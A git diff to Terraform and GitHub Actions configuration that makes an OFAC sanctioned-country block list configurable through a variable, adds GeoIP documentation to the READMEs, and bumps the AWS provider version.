diff --git a/.github/workflows/sub-infra-apply.yml b/.github/workflows/sub-infra-apply.yml index 898ad05..555538b 100644 --- a/.github/workflows/sub-infra-apply.yml +++ b/.github/workflows/sub-infra-apply.yml @@ -79,6 +79,7 @@ jobs: id: configure-tfvars working-directory: ${{ vars.TF_DIRECTORY }} run: | + echo 'ofac_blocked_countries="${{ vars.OFAC_BLOCKED_COUNTRIES }}"' >> plan.auto.tfvars echo 'image_version="${{ inputs.version }}"' >> plan.auto.tfvars echo 'grafana_auth="${{ steps.grafana-get-key.outputs.key }}"' >> plan.auto.tfvars diff --git a/.github/workflows/sub-infra-plan.yml b/.github/workflows/sub-infra-plan.yml index 3674acc..d5c3654 100644 --- a/.github/workflows/sub-infra-plan.yml +++ b/.github/workflows/sub-infra-plan.yml @@ -83,6 +83,7 @@ jobs: - name: Configure Terraform Variables working-directory: ${{ vars.TF_DIRECTORY }} run: | + echo 'ofac_blocked_countries="${{ vars.OFAC_BLOCKED_COUNTRIES }}"' >> plan.auto.tfvars echo 'image_version="${{ inputs.version }}"' >> plan.auto.tfvars echo 'grafana_auth="${{ steps.grafana-get-key.outputs.key }}"' >> plan.auto.tfvars diff --git a/terraform/README.md b/terraform/README.md index c756d96..00a5fbb 100644 --- a/terraform/README.md +++ b/terraform/README.md @@ -26,7 +26,7 @@ Now you can apply the changes: | Name | Version | |------|---------| -| [aws](#provider\_aws) | 5.12.0 | +| [aws](#provider\_aws) | 5.17.0 | | [random](#provider\_random) | 3.5.1 | | [terraform](#provider\_terraform) | n/a | ## Modules @@ -48,6 +48,7 @@ Now you can apply the changes: |------|-------------|------|---------|:--------:| | [betterstack\_cloudwatch\_webhook](#input\_betterstack\_cloudwatch\_webhook) | The BetterStack webhook to send CloudWatch alerts to |
string
| n/a
| yes |
| [betterstack\_prometheus\_webhook](#input\_betterstack\_prometheus\_webhook) | The BetterStack webhook to send Prometheus alerts to | string
| n/a
| yes |
+| [geoip\_db\_key](#input\_geoip\_db\_key) | The name to the GeoIP database | string
| "GeoLite2-City.mmdb"
| no |
| [grafana\_auth](#input\_grafana\_auth) | The API Token for the Grafana instance | string
| ""
| no |
| [image\_version](#input\_image\_version) | The version of the image to deploy | string
| n/a
| yes |
| [keystore\_primary\_instance\_class](#input\_keystore\_primary\_instance\_class) | The instance class of the primary docdb instances | string
| n/a
| yes |
@@ -56,6 +57,7 @@ Now you can apply the changes:
| [keystore\_replica\_instance\_count](#input\_keystore\_replica\_instance\_count) | The number of replica docdb instances to deploy | number
| n/a
| yes |
| [log\_level](#input\_log\_level) | Defines logging level for the application | string
| n/a
| yes |
| [notification\_channels](#input\_notification\_channels) | The notification channels to send alerts to | list(any)
| []
| no |
+| [ofac\_blocked\_countries](#input\_ofac\_blocked\_countries) | The list of countries to block | string
| ""
| no |
## Outputs
No outputs.
diff --git a/terraform/ecs/README.md b/terraform/ecs/README.md
index 8636cab..f353c9e 100644
--- a/terraform/ecs/README.md
+++ b/terraform/ecs/README.md
@@ -31,11 +31,14 @@ This module creates an ECS cluster and an autoscaling group of EC2 instances to
| [allowed\_lb\_ingress\_cidr\_blocks](#input\_allowed\_lb\_ingress\_cidr\_blocks) | A list of CIDR blocks to allow ingress access to the load-balancer. | string
| n/a
| yes |
| [context](#input\_context) | Single object for setting entire context at once.any
| n/a
| yes |
| [ecr\_repository\_url](#input\_ecr\_repository\_url) | The URL of the ECR repository where the app image is stored | string
| n/a
| yes |
+| [geoip\_db\_bucket\_name](#input\_geoip\_db\_bucket\_name) | The name of the S3 bucket where the GeoIP database is stored | string
| n/a
| yes |
+| [geoip\_db\_key](#input\_geoip\_db\_key) | The key of the GeoIP database in the S3 bucket | string
| n/a
| yes |
| [image\_version](#input\_image\_version) | The version of the app image to deploy | string
| n/a
| yes |
| [keystore\_addr](#input\_keystore\_addr) | The address of the MongoDB instance to use for the persistent keystore | string
| n/a
| yes |
| [log\_level](#input\_log\_level) | Defines logging level for the application | string
| n/a
| yes |
| [max\_capacity](#input\_max\_capacity) | Maximum number of instances in the autoscaling group | number
| 8
| no |
| [min\_capacity](#input\_min\_capacity) | Minimum number of instances in the autoscaling group | number
| 2
| no |
+| [ofac\_blocked\_countries](#input\_ofac\_blocked\_countries) | The list of countries to block | string
| n/a
| yes |
| [port](#input\_port) | The port the app listens on | number
| n/a
| yes |
| [private\_subnets](#input\_private\_subnets) | The IDs of the private subnets to deploy to | list(string)
| n/a
| yes |
| [prometheus\_endpoint](#input\_prometheus\_endpoint) | The endpoint of the Prometheus server to use for monitoring | string
| n/a
| yes |
diff --git a/terraform/ecs/cluster.tf b/terraform/ecs/cluster.tf
index c37e454..1f80d31 100644
--- a/terraform/ecs/cluster.tf
+++ b/terraform/ecs/cluster.tf
@@ -81,7 +81,7 @@ resource "aws_ecs_task_definition" "app_task" {
{ "name" = "GEOIP_DB_BUCKET", "value" = var.geoip_db_bucket_name },
{ "name" = "GEOIP_DB_KEY", "value" = var.geoip_db_key },
- { "name" = "BLOCKED_COUNTRIES", "value" = "KP,IR,CU,SY" },
+ { "name" = "BLOCKED_COUNTRIES", "value" = var.ofac_blocked_countries },
],
portMappings = [
diff --git a/terraform/ecs/variables.tf b/terraform/ecs/variables.tf
index 8c06c4e..c42c771 100644
--- a/terraform/ecs/variables.tf
+++ b/terraform/ecs/variables.tf
@@ -91,6 +91,11 @@ variable "log_level" {
type = string
}
+variable "ofac_blocked_countries" {
+ description = "The list of countries to block"
+ type = string
+}
+
#---------------------------------------
# Monitoring
diff --git a/terraform/monitoring/README.md b/terraform/monitoring/README.md
index 26dc7b6..9b707cc 100644
--- a/terraform/monitoring/README.md
+++ b/terraform/monitoring/README.md
@@ -38,9 +38,7 @@ Configure the Grafana dashboards for the application
| [prometheus\_endpoint](#input\_prometheus\_endpoint) | The endpoint for the Prometheus server. | string
| n/a
| yes |
## Outputs
-| Name | Description |
-|------|-------------|
-| [dashboard\_definition](#output\_dashboard\_definition) | The JSON definition of the dashboard. |
+No outputs.
diff --git a/terraform/res_application.tf b/terraform/res_application.tf
index 286a767..8bf3656 100644
--- a/terraform/res_application.tf
+++ b/terraform/res_application.tf
@@ -27,9 +27,10 @@ module "ecs" {
allowed_lb_ingress_cidr_blocks = module.vpc.vpc_cidr_block
# Application
- port = 8080
- keystore_addr = module.keystore.connection_url
- log_level = var.log_level
+ port = 8080
+ keystore_addr = module.keystore.connection_url
+ log_level = var.log_level
+ ofac_blocked_countries = var.ofac_blocked_countries
# Monitoring
prometheus_endpoint = aws_prometheus_workspace.prometheus.prometheus_endpoint
diff --git a/terraform/variables.tf b/terraform/variables.tf
index 968d8fb..9224ae4 100644
--- a/terraform/variables.tf
+++ b/terraform/variables.tf
@@ -31,6 +31,11 @@ variable "log_level" {
type = string
}
+variable "ofac_blocked_countries" {
+ description = "The list of countries to block"
+ type = string
+ default = ""
+}
#-------------------------------------------------------------------------------
# Keystore